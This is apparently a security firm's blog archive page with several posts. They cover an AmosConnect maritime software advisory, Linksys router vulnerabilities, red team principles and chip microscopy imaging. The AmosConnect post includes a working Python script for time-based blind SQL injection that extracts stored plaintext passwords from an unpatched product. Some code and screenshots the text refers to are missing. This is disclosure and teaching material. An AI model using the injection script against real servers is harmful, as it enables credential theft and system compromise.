RESEARCH | October 26, 2017

AmosConnect: Maritime Communications Security Has Its Flaws

Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper into this area and have learned a lot more about some of the environments in which these systems are deployed.

Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.
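
For readers who want to poke at this data themselves, the short sketch below uses the official Shodan Python library to pull a handful of exposed terminals and their reported positions. The search term and API key are illustrative placeholders, not the exact fingerprint behind Shodan’s ship tracker:

# Hedged sketch: querying Shodan for Internet-exposed VSAT terminals.
# "vsat" is an illustrative search term, and the API key is a placeholder.
import shodan

api = shodan.Shodan("YOUR_SHODAN_API_KEY")

results = api.search("vsat")
print("Total results:", results["total"])
for banner in results["matches"][:10]:
    location = banner.get("location", {})
    print(banner["ip_str"],
          location.get("latitude"),
          location.get("longitude"),
          banner.get("org"))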


The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.

Satellite connectivity is an expensive resource. To minimize its cost, several products exist that optimize and compress data in transit. One of the products that caught our eye was AmosConnect.

AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as: 

  • E-mail
  • Instant messaging
  • Position reporting
  • Crew Internet
  • Automatic file transfer
  • Application integration


We have identified two critical vulnerabilities in this software that allow pre-authenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.

 

Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit.

The following POST request is sent when a user tries to log into AmosConnect:


The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks.

Attackers who successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.password';

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.email_address';
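
To illustrate the time-based technique, the sketch below (Python) recovers query results one character at a time through the vulnerable data[MailUser][emailAddress] parameter. The login URL, the password field name, and the exact injection string are assumptions made for illustration; since SQLite has no SLEEP() function, a heavy expression such as randomblob() is used to introduce a measurable delay when the injected condition is true:

# Hedged sketch of time-based blind SQL injection against the login form.
# The URL, password field name, and injection syntax are assumptions.
import string
import time
import requests

LOGIN_URL = "https://amosconnect-server/index.php/users/login"  # hypothetical path

def condition_is_true(condition):
    # Make the backend evaluate an expensive expression only when `condition`
    # holds, then decide truth by measuring the response time.
    payload = ("x' AND (CASE WHEN ({0}) THEN randomblob(200000000) "
               "ELSE 1 END) AND '1'='1").format(condition)
    data = {
        "data[MailUser][emailAddress]": payload,
        "data[MailUser][password]": "x",  # field name assumed
    }
    start = time.time()
    requests.post(LOGIN_URL, data=data, verify=False, timeout=60)
    return time.time() - start > 5  # delay threshold; tune per target

def extract(query, max_length=64):
    # Recover the first row returned by `query`, one character at a time.
    candidates = string.ascii_letters + string.digits + "@._-"  # extend as needed
    recovered = ""
    for position in range(1, max_length + 1):
        for candidate in candidates:
            check = "substr(({0}),{1},1) = '{2}'".format(query, position, candidate)
            if condition_is_true(check):
                recovered += candidate
                break
        else:
            break  # no candidate matched: assume end of string
    return recovered

# Pull a stored (plaintext) password, as described above.
print(extract("SELECT value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.password' LIMIT 1"))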

The authentication method is implemented in mail_user.php:

The call to findByEmail() instantiates a COM object that is implemented in native C++ code.

 

The following C++ native methods are invoked upon execution of the call:
     Neptune::UserManager::User::findByEmail( … )
          Neptune::ConfigManager::Property::findBy( … )
               Neptune::ConfigManager::Property::findAllBy( … )
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:

 

 

Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
“[…] deleted = 0 AND key like 'USER.%.email_address' AND upper(value) like '{email}'”
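
As an illustration of the flaw class (in Python/sqlite3, not the actual Neptune C++ code), the sketch below contrasts the concatenated query with a parameterized equivalent that would not be injectable:

# Illustration only: the same lookup built unsafely by concatenation
# versus safely with a bound parameter. Table and column names follow
# the queries shown above; the database file name is hypothetical.
import sqlite3

conn = sqlite3.connect("amosconnect.db")

def find_all_by_unsafe(email):
    # Vulnerable pattern: attacker-controlled input is spliced into the SQL text.
    sql = ("SELECT key, value FROM MOBILE_PROPS WHERE deleted = 0 "
           "AND key LIKE 'USER.%.email_address' "
           "AND upper(value) LIKE '" + email + "'")
    return conn.execute(sql).fetchall()

def find_all_by_safe(email):
    # Fix: bind the value as a parameter so it can never change the query structure.
    sql = ("SELECT key, value FROM MOBILE_PROPS WHERE deleted = 0 "
           "AND key LIKE 'USER.%.email_address' "
           "AND upper(value) LIKE ?")
    return conn.execute(sql, (email,)).fetchall()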

 

Privileged Backdoor Account

The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
 
Users accessing the AmosConnect server see the following login screen:
 
The login page reveals the Post Office ID; this ID identifies the AmosConnect server and is tied to the software license.
 
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
 
authenticateBackdoorUser() is implemented as follows:
 
 
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:

Conclusions and Thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
  • Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
  • Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configurations, the ICS and Navigation networks may actually be the same.
  • IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; it’s within this network that AmosConnect is typically deployed.
  • Bring-Your-Own-Device (BYOD) networks. Vessels may feature a separate network to provide Internet connectivity to guests or crew members’ personal devices.
  • SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, it’s important to note that in certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest” network and the IT network; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some of the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
 
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks, or pivot within the vessel networks.
References:
https://shiptracker.shodan.io/
RESEARCH | April 20, 2017

Linksys Smart Wi-Fi Vulnerabilities

By Tao Sauvage

Last year I acquired a Linksys Smart Wi-Fi router, more specifically the EA3500 Series. I chose Linksys (previously owned by Cisco and currently owned by Belkin) due to its popularity, and because I thought it would be interesting to look at a router heavily marketed outside of Asia, hoping for different results than in my previous research on the BHU Wi-Fi uRouter, which is only distributed in China.

Smart Wi-Fi is the latest family of Linksys routers and includes more than 20 different models that use the latest 802.11N and 802.11AC standards. Even though they can be remotely managed from the Internet using the Linksys Smart Wi-Fi free service, we focused our research on the router itself.

Figure 1: Linksys EA3500 Series UART connection

My friend @xarkes_, a security aficionado, and I decided to analyze the firmware (i.e., the software installed on the router) in order to assess the security of the device. The technical details of our research will be published soon after Linksys releases a patch that addresses the issues we discovered, to ensure that all users with affected devices have enough time to upgrade.

In the meantime, we are providing an overview of our results, as well as key metrics to evaluate the overall impact of the vulnerabilities identified.

Security Vulnerabilities

After reverse engineering the router firmware, we identified a total of 10 security vulnerabilities, ranging from low- to high-risk issues, six of which can be exploited remotely by unauthenticated attackers.

Two of the security issues we identified allow unauthenticated attackers to create a Denial-of-Service (DoS) condition on the router. By sending a few requests or abusing a specific API, an attacker can make the router unresponsive and even force it to reboot. The Admin is then unable to access the web admin interface and users are unable to connect until the attacker stops the DoS attack.

Attackers can also bypass the authentication protecting the CGI scripts to collect technical and sensitive information about the router, such as the firmware version and Linux kernel version, the list of running processes, the list of connected USB devices, or the WPS pin for the Wi-Fi connection. Unauthenticated attackers can also harvest sensitive information, for instance using a set of APIs to list all connected devices and their respective operating systems, access the firewall configuration, read the FTP configuration settings, or extract the SMB server settings.

Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account. It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different than the authentication protecting the CGI scripts.

Linksys has provided a list of all affected models:

  • EA2700
  • EA2750
  • EA3500
  • EA4500v3
  • EA6100
  • EA6200
  • EA6300
  • EA6350v2
  • EA6350v3
  • EA6400
  • EA6500
  • EA6700
  • EA6900
  • EA7300
  • EA7400
  • EA7500
  • EA8300
  • EA8500
  • EA9200
  • EA9400
  • EA9500
  • WRT1200AC
  • WRT1900AC
  • WRT1900ACS
  • WRT3200ACM

Cooperative Disclosure
We disclosed the vulnerabilities and shared the technical details with Linksys in January 2017. Since then, we have been in constant communication with the vendor to validate the issues, evaluate the impact, and synchronize our respective disclosures.

We would like to emphasize that Linksys has been exemplary in handling the disclosure and we are happy to say they are taking security very seriously.

We acknowledge the challenge of reaching out to the end-users with security fixes when dealing with embedded devices. This is why Linksys is proactively publishing a security advisory to provide temporary solutions to prevent attackers from exploiting the security vulnerabilities we identified, until a new firmware version is available for all affected models.

Metrics and Impact 

As of now, we can already safely evaluate the impact of such vulnerabilities on Linksys Smart Wi-Fi routers. We used Shodan to identify vulnerable devices currently exposed on the Internet.

 

 

Figure 2: Distribution of vulnerable Linksys routers per country

We found about 7,000 vulnerable devices exposed at the time of the search. It should be noted that this number does not take into account vulnerable devices protected by strict firewall rules or running behind another network appliance, which could still be compromised by attackers who have access to the individual’s or company’s internal network.

A vast majority of the vulnerable devices (~69%) are located in the USA and the remainder are spread across the world, including Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%). Venezuela, Argentina, Russia, Sweden, Norway, China, India, the UK, Australia, and many other countries each represent less than 1%.
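
A per-country breakdown like the one above is straightforward to reproduce with Shodan’s facet API; in the sketch below the query string is a deliberate placeholder, since we are not publishing the fingerprint that identifies vulnerable Smart Wi-Fi devices:

# Sketch of a per-country breakdown using Shodan facets.
# The query is a placeholder; the real device fingerprint is intentionally omitted.
import shodan

api = shodan.Shodan("YOUR_SHODAN_API_KEY")
QUERY = "<linksys-smart-wifi-fingerprint>"  # placeholder

counts = api.count(QUERY, facets=[("country", 20)])
total = counts["total"]
print("Exposed devices:", total)
for bucket in counts["facets"]["country"]:
    share = 100.0 * bucket["count"] / total
    print("{0}: {1} ({2:.1f}%)".format(bucket["value"], bucket["count"], share))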

We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.

We found that 11% of the ~7,000 exposed devices were using default credentials and therefore could be rooted by attackers.

Recommendations

We advise Linksys Smart Wi-Fi users to carefully read the security advisory published by Linksys to protect themselves until a new firmware version is available. We also recommend users change the default password of the Admin account to protect the web admin interface.

Timeline Overview

  • January 17, 2017: IOActive sends a vulnerability report to Linksys with findings 
  • January 17, 2017: Linksys acknowledges receipt of the information
  • January 19, 2017: IOActive communicates its obligation to publicly disclose the issue within three months of reporting the vulnerabilities to Linksys, for the security of users
  • January 23, 2017: Linksys acknowledges IOActive’s intent to publish and timeline; requests notification prior to public disclosure
  • March 22, 2017: Linksys proposes release of a customer advisory with recommendations for protection
  • March 23, 2017: IOActive agrees to Linksys proposal
  • March 24, 2017: Linksys confirms the list of vulnerable routers
  • April 20, 2017: Linksys releases an advisory with recommendations and IOActive publishes findings in a public blog post
INSIGHTS | September 1, 2016

Five Attributes of an Effective Corporate Red Team

After talking recently with colleagues at IOActive as well as some heads of industry-leading red teams, we wanted to share a list of attributes that we believe are key to any effective Red Team.

[ NOTE: For debate about the relevant terminology, we suggest Daniel’s post titled The Difference Between Red, Blue, and Purple Teams. ]

To be clear, we think there can be significant variance in how Red Teams are built and managed, and we believe there are likely multiple routes to success. But we believe there are a few key attributes that all (or at least most) corporate Red Teams should have as part of their program. These are:

  1. Organizational Independence
  2. Defensive Coordination
  3. Continuous Operation
  4. Adversary Emulation
  5. Efficacy Measurement

Let’s look at each of these.

Organizational Independence is the requirement that the Red Team be able to effectively act as a real-world attacker in terms of scope, tools, and techniques employed. Many organizations restrict their Red Teams to such a degree that they’re basically impotent, which in turn lulls the company into a false sense of security.

Defensive Coordination is the requirement that Red Teams regularly interact with their counterparts on the defensive side to ensure the organization is learning from their activities. If a Red Team is effective on its own, but doesn’t share its knowledge and successes with the defense in order to make it stronger, then the Red Team has lost sight of its purpose.

Continuous Operation is the requirement that the organization remain under constant, rolling attack by the Red Team, which is the polar opposite of short, penetration-test-style engagements. Red Teams should operate through campaigns that span weeks or months in duration, and both the defensive teams and the general user population should know that at any moment of any day they could be targeted by a Red Team campaign of some sort, or by a real attacker.

Adversary Emulation is the requirement that Red Team campaigns should be regularly updated based on the actual tools, techniques, and processes employed by real-world attackers. If cyber-criminals are doing X this quarter, let’s emulate that. If we’re seeing some state actors doing Y this year, let’s emulate that. If you’re not simulating—to some significant degree—the techniques being used by actual attackers, the Red Team is providing questionable value.

Efficacy Measurement is the requirement that Red Teams know how effective they are at improving the security posture of the organization. If the Red Team can’t tell a clear story about how the defenses are improving, i.e., that it’s getting increasingly difficult to compromise the organization, move laterally, and achieve attacker goals, then the organization is getting limited value from any work that’s being done.

Summary

Here’s a pointed summary of those attributes:

  • If your group is significantly restricted in its scope and capabilities by the organization, you probably don’t have an effective Red Team
  • If your group doesn’t regularly work hand-in-hand with the defensive side of the organization in order to improve the organization’s security posture, you probably don’t have an effective Red Team
  • If your internal or external service operates based on projects that happen once in a while rather than being staggered and continuous, you probably don’t have an effective Red Team
  • If you aren’t constantly updating your attack campaigns based on new intelligence on actual threat actors, you probably don’t have an effective Red Team
  • If you aren’t closely monitoring the effectiveness of the attack campaigns (and the responses to them by the defense) over time, you probably don’t have an effective Red Team

There are many other components of a solid Red Team that were not mentioned—top-end malware kits, elite security talent, deep understanding of the attacker mindset, etc.—but we think these five components are both most fundamental and most lacking.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.
INSIGHTS | March 22, 2016

Inside the IOActive Silicon Lab: Interpreting Images

In the post “Reading CMOS layout,” we discussed understanding CMOS layout in order to reverse-engineer photographs of a circuit to a transistor-level schematic. This was all well and good, but I glossed over an important (and often overlooked) part of the process: using the photos to observe and understand the circuit’s actual geometry.


Optical Microscopy

Let’s start with brightfield optical microscope imagery. (Darkfield microscopy is rarely used for semiconductor work.) Although reading lower metal layers on modern deep-submicron processes does usually require electron microscopy, optical microscopes still have their place in the reverse engineer’s toolbox. They are much easier to set up and run quickly, have a wider field of view at low magnifications, need less sophisticated sample preparation, and provide real-time full-color imagery. An optical microscope can also see through glass insulators, allowing inspection of some underlying structures without needing to deprocess the device.
 
This can be both a blessing and a curse. If you can see underlying structures in upper-layer images, it can be much easier to align views of different layers. But it can also be much harder to tell what you’re actually looking at! Luckily, another effect comes to the rescue – depth of field.


Depth of field

When using an objective with 40x power or higher, a typical optical microscope has a useful focal plane of less than 1 µm. This means that it is critical to keep the sample stage extremely flat – a slope of only 100 nm per mm (0.005 degrees) can result in one side of a 10x10mm die being in razor-sharp focus while the other side is blurred beyond recognition.
 
In the image below (from a Micrel KSZ9021RN gigabit Ethernet PHY) the top layer is in sharp focus but all of the features below are blurred—the deeper the layer, the harder it is to see.
We as reverse engineers can use this to our advantage. By sweeping the focus up or down, we can get a qualitative feel for which wires are above, below, or on the same layer as other wires. Although it can be useful in still photos, the effect is most intuitively understood when looking through the eyepiece and adjusting the focus knob by hand. Compare the previous image to this one, with the focal plane shifted to one of the lower metal layers.
I also find that it’s sometimes beneficial to image a multi-layer IC using a higher magnification than strictly necessary, in order to deliberately limit the depth of field and blur out other wiring layers. This can provide a cleaner, more easily understood image, even if the additional resolution isn’t necessary.


Color

Another important piece of information the optical microscope provides is color. The color of a feature under an optical microscope is typically dependent on three factors:
  • Material color
  • Orientation of the surface relative to incident light
  • Thickness of the glass/transparent material over it

 
Material color is the easiest to understand. A flat, smooth surface of a substance with nothing on top will have the same color as the bulk material. The octagonal bond pads in the image below (a Xilinx XC3S50A FPGA), for example, are made of bare aluminum and show up as a smooth silvery color, just as one would expect. Unfortunately, most materials used in integrated circuits are either silvery (silicon, polysilicon, aluminum, tungsten) or clear (silicon dioxide or nitride). Copper is the lone exception.
 
Orientation is another factor to consider. If a feature is tilted relative to the incident light, it will be less brightly lit. The dark squares in the image below are vias in the upper metal layer which go down to the next layer; the “sag” in the top layer is not filled in this process so the resulting slopes show up as darker. This makes topography visible on an otherwise featureless surface.
The third property affecting the observed color of a feature is the thickness of the glass above it. When light hits a reflective surface that sits beneath a transparent layer, some of the beam bounces off the lower surface and some bounces off the top of the glass. The two beams interfere with each other, constructively or destructively depending on how the wavelength compares to the round-trip optical path through the glass.
 
This is the same effect responsible for the colors seen in a film of oil floating on a puddle of water–the reflections from the oil’s surface and the oil-water interface interfere. Since the oil film is not exactly the same thickness across the entire puddle, the observed colors vary slightly. In the image above, the clear silicon nitride passivation is uniform in thickness, so the top layer wiring (aluminum, mostly for power distribution) shows up as a uniform tannish color. The next layer down has more glass over it and shows up as a slightly different pink color.
 
Compare that to the image below (an Altera EPM3064A CPLD). The thickness of the top passivation layer varies significantly across the die surface, resulting in rainbow-colored fringes.
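
As a rough illustration of why thickness maps to color, the back-of-the-envelope calculation below finds which visible wavelengths reflect strongly for an assumed nitride thickness and refractive index (interface phase shifts are ignored); nudging the thickness shifts the favored wavelengths, which is exactly what produces the fringes:

# Back-of-the-envelope thin-film interference estimate.
# The refractive index and thickness are assumed, illustrative values.
n = 2.0        # approximate refractive index of silicon nitride
t_nm = 500.0   # assumed passivation thickness, in nanometres

optical_path = 2 * n * t_nm  # round-trip optical path difference at normal incidence
for order in range(1, 10):
    wavelength = optical_path / order
    if 380 <= wavelength <= 750:  # visible range
        print("order {0}: strong reflection near {1:.0f} nm".format(order, wavelength))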
 

Electron Microscopy

The scanning electron microscope is the preferred tool for imaging finer pitch features (below about 250 nm). Due to the smaller wavelength of electron beams as compared to visible light, this tool can obtain significantly higher resolutions.
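
As a rough, non-relativistic estimate (actual SEM resolution is limited by spot size and lens aberrations long before the wavelength limit is reached), the de Broglie wavelength of a beam electron can be computed directly from the accelerating voltage:

# Non-relativistic de Broglie wavelength of an electron accelerated through V volts.
import math

h = 6.626e-34    # Planck constant, J*s
m_e = 9.109e-31  # electron mass, kg
q = 1.602e-19    # elementary charge, C

def electron_wavelength_nm(voltage):
    return h / math.sqrt(2 * m_e * q * voltage) * 1e9

for kv in (1, 5, 20, 30):
    print("{0:>2} kV -> {1:.4f} nm".format(kv, electron_wavelength_nm(kv * 1000.0)))
# At 20 kV this gives roughly 0.009 nm, versus ~400-700 nm for visible light.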
 
The basic operating principle of a SEM is similar to an old-fashioned CRT display: electromagnets move a beam of electrons in a vacuum chamber in a raster-scan pattern over the sample. At each pixel, the beam interacts with the sample, producing several forms of radiation that the microscope can detect and use for imaging.
 
Electron microscopy in general has an extremely high depth of field, making it very useful for imaging 3D structures. The image below (copper bond wires on a Microchip PIC12F683) has about the same field of view as the optical images from the beginning of this article, but even from a tilted perspective the entire loop of wire is in sharp focus.
 
 

Secondary Electron Images

The most common general-purpose image detector for the SEM is the secondary electron detector. When a high-energy electron from the scanning beam grazes an atom in the sample, it sometimes dislodges an electron from the outer shell. Secondary electrons have very low energy, and will slow to a stop after traveling a fairly short distance. As a result, only those generated very near the surface of the sample will escape and be detected.
 
This makes secondary electron images very sensitive to topography. Outside edges, tilted surfaces, and small point features (dust and particulates) show up brighter than a flat surface because a high percentage of the secondary electrons are generated near exposed surfaces of the specimen. Inward-facing edges show up dimmer than a flat surface because a high percentage of the secondary electrons are absorbed in the material.
 
The general appearance of a secondary electron image is similar to a surface lit up with a floodlight. The eye position is that of the objective lens, and the “light source” appears to come from the position of the secondary electron detector.
 
In the image below (the polysilicon layer of a Microchip PIC12F683 before cleaning), the polysilicon word lines running horizontally across the memory array have bright edges, which shows that they are raised above the background. The diamond-shaped source/drain areas have dark “shadowed” edges, showing that they are lower than their surroundings (and thus many of the secondary electrons are being absorbed). The dust particles and loose tungsten via plugs scattered around the image show up very brightly because they have so much exposed surface area.
Compare the above SEM view to the optical image of the same area below. Note that the SEM image has much higher resolution, but the optical image reveals (through color changes) thickness variations in the glass layer that are not obvious in the SEM. This can be very helpful when trying to gauge progress or uniformity of an etch/polish operation.
In addition to the primary contrast mechanism discussed above, the efficiency of secondary electron emission is weakly dependent on the elemental composition of the material being observed. For example, at 20 kV the number of secondary electrons produced for a given beam current is about four times higher for tungsten than for silicon (see this paper). While this may lead to some visible contrast in a secondary electron image, if elemental information is desired, it would be preferable to use a less topography-sensitive imaging mode.
 

Backscattered Electron Images

Secondary electron imaging does not work well on flat specimens, such as a die that has been polished to remove upper metal layers or a cross section. Although it’s often possible to etch such a sample to produce topography for imaging in secondary electron mode, it’s usually easier to image the flat sample using backscatter mode.
 
When a high-energy beam electron directly impacts the nucleus of an atom in the sample, it will bounce back at high speed in the approximate direction it came from. The probability of such a “backscatter” event happening depends on the atomic number Z of the material being imaged. Since backscatters are very energetic, the surrounding material does not easily absorb them. As a result, the appearance of the resulting image is not significantly influenced by topography and contrast is primarily dependent on material (Z-contrast).
 
In the image below (cross section of a Xilinx XC2C32A CPLD), the silicon substrate (bottom, Z=14) shows up as a medium gray. The silicon dioxide insulator between the wires is darker due to the lower average atomic number (Z=8 for oxygen). The aluminum wires (Z=13) are about the same color as the silicon, but the titanium barrier layer (Z=22) above and below is significantly brighter. The tungsten vias (Z=74) are extremely bright white. Looking at the bottom right where the via plugs touch the silicon, a thin layer of cobalt (Z=27) silicide is visible.

Depending on the device you are analyzing, any or all of these three imaging techniques may be useful. Knowledge of the pros and cons of these techniques and the ability to interpret their results are key skills for the semiconductor reverse engineer.